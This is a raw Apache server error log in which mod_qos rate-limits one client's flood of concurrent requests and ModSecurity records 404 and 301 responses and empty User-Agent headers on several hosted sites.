[Tue May 26 19:55:05.097643 2026] [qos:error] [pid 93868:tid 94320] [client 45.148.10.120:49016] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O3QAAAc0
[Tue May 26 19:55:05.108370 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:49046] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O3gAAAfA
[Tue May 26 19:55:05.222033 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:49012] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWeAAAADs
[Tue May 26 19:55:05.226451 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:49004] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWeQAAAFM
[Tue May 26 19:55:05.228483 2026] [qos:error] [pid 93868:tid 94271] [client 45.148.10.120:49034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O3wAAAZw
[Tue May 26 19:55:05.231852 2026] [qos:error] [pid 93868:tid 94287] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O4AAAAaw
[Tue May 26 19:55:05.232584 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:48990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWegAAAD4
[Tue May 26 19:55:05.233805 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:48936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O4QAAAdM
[Tue May 26 19:55:05.238635 2026] [qos:error] [pid 93868:tid 94362] [client 45.148.10.120:48954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O4gAAAfc
[Tue May 26 19:55:05.240954 2026] [qos:error] [pid 93868:tid 94321] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O4wAAAc4
[Tue May 26 19:55:05.253554 2026] [qos:error] [pid 93868:tid 94373] [client 45.148.10.120:49016] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O5AAAAgI
[Tue May 26 19:55:05.262407 2026] [qos:error] [pid 93868:tid 94339] [client 45.148.10.120:49046] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O5QAAAeA
[Tue May 26 19:55:05.273521 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWHgAAAGw"]
[Tue May 26 19:55:05.276693 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25ObAAAAZo"]
[Tue May 26 19:55:05.279226 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWFwAAAC4"]
[Tue May 26 19:55:05.279789 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWMgAAADQ"]
[Tue May 26 19:55:05.290563 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWNwAAAAw"]
[Tue May 26 19:55:05.291060 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWKgAAAG0"]
[Tue May 26 19:55:05.300454 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWJgAAADA"]
[Tue May 26 19:55:05.323264 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWJQAAAAs"]
[Tue May 26 19:55:05.324930 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWPQAAAA0"]
[Tue May 26 19:55:05.327677 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWPgAAABw"]
[Tue May 26 19:55:05.328350 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWUgAAAGU"]
[Tue May 26 19:55:05.335464 2026] [security2:error] [pid 86490:tid 86741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP1ZMwN0DpLVWo6LKyAAAAP4"]
[Tue May 26 19:55:05.353121 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWQQAAAEQ"]
[Tue May 26 19:55:05.356218 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWVgAAAC0"]
[Tue May 26 19:55:05.356247 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWLgAAAEk"]
[Tue May 26 19:55:05.357083 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWIQAAACc"]
[Tue May 26 19:55:05.365606 2026] [security2:error] [pid 86490:tid 86625] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQFZMwN0DpLVWo6LK8AAAAIo"]
[Tue May 26 19:55:05.381331 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWOwAAAAE"]
[Tue May 26 19:55:05.388865 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWPAAAAH8"]
[Tue May 26 19:55:05.392538 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWRAAAAA4"]
[Tue May 26 19:55:05.409876 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OkwAAAd8"]
[Tue May 26 19:55:05.410283 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWQgAAAHo"]
[Tue May 26 19:55:05.417955 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQFZMwN0DpLVWo6LK8QAAAJw"]
[Tue May 26 19:55:05.419775 2026] [security2:error] [pid 93868:tid 94371] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25O6wAAAgA"]
[Tue May 26 19:55:05.419794 2026] [security2:error] [pid 93868:tid 94371] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25O6wAAAgA"]
[Tue May 26 19:55:05.419845 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWVQAAAHw"]
[Tue May 26 19:55:05.422837 2026] [security2:error] [pid 93868:tid 94276] [client 65.109.156.37:55644] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWtQUqK9k_ZUB2Vp25O6AAAAaE"]
[Tue May 26 19:55:05.423128 2026] [security2:error] [pid 86490:tid 86731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQFZMwN0DpLVWo6LK-AAAAPQ"]
[Tue May 26 19:55:05.427362 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWXgAAAFw"]
[Tue May 26 19:55:05.430402 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OmwAAAdg"]
[Tue May 26 19:55:05.439257 2026] [security2:error] [pid 93868:tid 94267] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25O6QAAAZg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1126632&moderation-hash=59b6df6061510784a9028b48d419324d
[Tue May 26 19:55:05.445178 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQFZMwN0DpLVWo6LK7wAAAPU"]
[Tue May 26 19:55:05.458033 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWVAAAACU"]
[Tue May 26 19:55:05.461817 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWUwAAADg"]
[Tue May 26 19:55:05.470156 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWVwAAAAQ"]
[Tue May 26 19:55:05.827779 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtQUqK9k_ZUB2Vp25PMAAAAe8
[Tue May 26 19:55:05.833290 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:49082] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWpgAAAFU
[Tue May 26 19:55:05.834198 2026] [qos:error] [pid 93868:tid 94304] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25PMgAAAb0
[Tue May 26 19:55:05.844584 2026] [security2:error] [pid 93868:tid 94331] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PJgAAAdg"]
[Tue May 26 19:55:05.844613 2026] [security2:error] [pid 93868:tid 94331] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PJgAAAdg"]
[Tue May 26 19:55:05.844877 2026] [security2:error] [pid 93868:tid 94296] [client 65.109.156.37:56250] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWtQUqK9k_ZUB2Vp25PIwAAAbU"]
[Tue May 26 19:55:05.845932 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWpwAAAG0
[Tue May 26 19:55:05.978204 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25PMwAAAZs
[Tue May 26 19:55:05.985465 2026] [qos:error] [pid 93868:tid 94344] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25PNAAAAeU
[Tue May 26 19:55:05.994023 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWqAAAAHI
[Tue May 26 19:55:05.995925 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:49082] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWqQAAABw
[Tue May 26 19:55:06.011935 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:49178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PNQAAAZQ
[Tue May 26 19:55:06.015178 2026] [qos:error] [pid 93868:tid 94321] [client 45.148.10.120:49146] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PNgAAAc4
[Tue May 26 19:55:06.024972 2026] [qos:error] [pid 93868:tid 94299] [client 45.148.10.120:49154] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PNwAAAbg
[Tue May 26 19:55:06.031692 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:49188] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25POAAAAbM
[Tue May 26 19:55:06.032774 2026] [qos:error] [pid 93868:tid 94380] [client 45.148.10.120:49164] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25POQAAAgk
[Tue May 26 19:55:06.042231 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:49196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQmDRMqfxdEDkoszWqgAAAD8
[Tue May 26 19:55:06.047726 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:49206] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25POgAAAZM
[Tue May 26 19:55:06.135198 2026] [qos:error] [pid 93868:tid 94304] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PPwAAAb0
[Tue May 26 19:55:06.137088 2026] [qos:error] [pid 93868:tid 94331] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PQAAAAdg
[Tue May 26 19:55:06.142320 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQmDRMqfxdEDkoszWrQAAACw
[Tue May 26 19:55:06.145204 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:49082] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQmDRMqfxdEDkoszWrgAAAH4
[Tue May 26 19:55:06.159381 2026] [qos:error] [pid 93868:tid 94362] [client 45.148.10.120:49178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PQQAAAfc
[Tue May 26 19:55:06.170526 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:49146] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PQgAAAfA
[Tue May 26 19:55:06.177974 2026] [qos:error] [pid 93868:tid 94296] [client 45.148.10.120:49154] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PQwAAAbU
[Tue May 26 19:55:06.182967 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:49188] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PRAAAAZs
[Tue May 26 19:55:06.189551 2026] [qos:error] [pid 93868:tid 94344] [client 45.148.10.120:49164] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PRQAAAeU
[Tue May 26 19:55:06.195835 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:49196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQmDRMqfxdEDkoszWrwAAADk
[Tue May 26 19:55:06.203403 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:49206] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQkqK9k_ZUB2Vp25PRgAAAZQ
[Tue May 26 19:55:06.276603 2026] [security2:error] [pid 86490:tid 86743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQFZMwN0DpLVWo6LK-wAAAQA"]
[Tue May 26 19:55:06.286103 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OoAAAAdI"]
[Tue May 26 19:55:06.288817 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OmgAAAZc"]
[Tue May 26 19:55:06.298343 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OzAAAAaU"]
[Tue May 26 19:55:06.299779 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQFZMwN0DpLVWo6LK8gAAAL4"]
[Tue May 26 19:55:06.303363 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OrgAAAcc"]
[Tue May 26 19:55:06.310325 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OqwAAAd0"]
[Tue May 26 19:55:06.315546 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OmQAAAdY"]
[Tue May 26 19:55:06.318579 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OqgAAAZ4"]
